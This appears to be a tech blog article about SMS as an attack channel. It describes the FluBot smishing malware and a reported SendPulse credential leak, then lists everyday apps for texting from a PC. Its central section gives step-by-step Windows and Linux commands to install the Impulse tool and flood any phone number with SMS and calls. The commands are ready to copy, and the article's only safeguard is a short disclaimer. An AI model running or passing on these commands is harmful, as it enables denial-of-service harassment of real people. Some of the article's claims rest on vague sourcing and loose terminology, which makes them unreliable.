Simple for users the process of sending SMS texts is simple for hackers too
Image source – pixabay.com
During 2021, FluBot, a malware that spreads through SMS messages, infected tens of thousands of Android devices. Attackers send texts telling you that you have:
These texts contain a link where you can download what is supposed to be a message for you, but it is actually a malicious app: the FluBot. Once it is installed, it tries to obtain your credit card and banking credentials, as well as uses your phone number to send even more SMS texts, creating a botnet.
Records of FluBot date back to April 2021 and CERT New Zealand wrote about it still being infectious in October the same year, so the virus still exists months later after its initial discovery.
Based on recent information about SendPulse email and sms provider had data leak of users’s credentials, it is very easy to imagine that sending sms on mass scale is more than feasible.
After quick validation by Cooltechzone team, it was concluded that most part of credentials are not valid anymore and it seems that SendPulse already aware of this incident.
In this article, I will show you why SMS is so powerful for cyber attackers, how they use tools for sending messages in their criminal activities, and a few tools that you can use to easily send SMS messages from your PC.
Table of Contents
Disclaimer: The attack shown in this article was done only for demonstration purposes and no outside targets were involved. Do not perform any malicious actions against others without their consent.
Impulse is a free to install app which can be used to perform DoS attacks by flooding the target with SMS messages, a technique called SMS Bombing. It uses Python 3 to run, but it requires no programming knowledge and it can be easily used by only typing a few simple commands.
We performed an attack on us to see if it works. Immediately after launching the attack, we received phone calls and messages on that phone numbers which froze the phone for a few minutes.
On Windows, do the following to install and use Impulse:
git clone https://github.com/LimerBoy/Impulse.git
cd Impulse
and then
pip install -r requirements.txt
This command installs some open-source libraries that Impulse requires
python impulse.py --method SMS --time 20 --threads 15 --target +<phone number>
This command runs a DoS attack with the following parameters:
python impulse.py –help
In the next image, you can see an Impulse attack launched to run 5 seconds on 5 threads. You can increase these numbers to send a powerful attack.
The process is similar on Linux machines. Instead of the first three steps, open Terminal and type the following commands:
sudo apt update
sudo apt install python3 python3-pip git -y
git clone https://github.com/LimerBoy/Impulse.git.
So why, in so much time, has no one found a way to eradicate the FluBot?
The answer is that it is very easily transmitted via SMS. Attackers use a technique called SMS Phishing, or Smishing: masquerading as a trusted entity and lurking victims into opening a link where they are either asked for private data or prompted to download a malicious app, masked as something benign.
You may have heard about email phishing, but Smishing can be a much more effective way. According to a trusted source, 9 out of 10 text messages are opened within the first three minutes of being received. Also, while emails can be categorized as junk or spam, SMS has no such protective feature. Victims don’t even need an internet connection to receive the messages.
As presented above with FluBot, a good way to send messages to as many people as possible is to create a botnet: a network of infected devices all controlled by an attacker or by a group of attackers. In this case, the infected phones are used to send even more texts, thus spreading the malware.
Of course, a virus whose only ability is to replicate itself is pretty much useless. One of the ways in which these apps can affect you is that they steal your private data stored in the phone, like confidential messages and photos, and can even act as a keylogger, thus obtaining your passwords and sending them to the attacker.
In other cases, attackers want to temporarily block a victim from using their device. This is done through a Denial of Service (DoS) attack, which here consists of (but generally it is not limited to) a lot of SMS messages being sent at the same time to a phone user.
For example, a trusted source informs us that, a few years ago, a vulnerability in LG Nexus devices allowed attackers to freeze, crash and even reboot by flooding them with SMS messages, possibly interrupting vital communication.
In the first section of this article, I showed you a free tool that you can install on your PC in order to experiment with how a DoS attack works.
The attacker may want to perform a DoS attack, but not have enough resources to make the attack powerful.
In this case, they can first create a botnet, infecting thousands of phones, and using them to flood a target with messages. This is called a Distributed Denial of Service (DDoS) attack and it is much more dangerous than a regular DoS attack since it uses all the infected devices to send texts.
In this section, I will first show you a few easy-to-use apps and tools that you can use to send SMS messages from your PC.
Microsoft offers Windows 10 users the Your Phone app, which connects you to your Android phone. The app is simple to use and allows you to manage not only messages but also calls and photos from your phone.
How to use the app:
If you’re an Apple user, a great app that you can use is iMessage. It comes preinstalled on iPhones and you can get it for free on your Mac computer. It can also be used with an iPod Touch or an iPad
iMessage uses Apple’s own messaging network to send messages over the internet, but otherwise, it works and looks exactly like normal SMS messaging.
To use this feature, first, you will have to set up SMS/MMS forwarding from your iPhone to your other Apple device.
Once you do that, here’s how you send messages using iMessage:
Image source - apple.com
On Google Chrome (or any other Chrome-based web browser), you can install an extension called “Send Your Email to SMS (text)”, offered by cloudhq.net. It will link to your Gmail account and let you send SMS messages very similar to how you would send an email.
Note that this extension supports only US and Canadian phone numbers.
According to a trusted source, it allows you to send up to 10 free messages per month. For $55 per month, you can upgrade the service and send unlimited messages.
To use the extension, do the following:
In this article, I showed you how easy and quick it is to perform a quick DDoS attack on a target only by knowing their phone number and installing a very simple tool from GitHub. You can do it either on Windows or Linux using this simple guide.
Have you ever used any of the tools shown in this article, or similar? If yes, please leave a comment below sharing your experience!
Leave a comment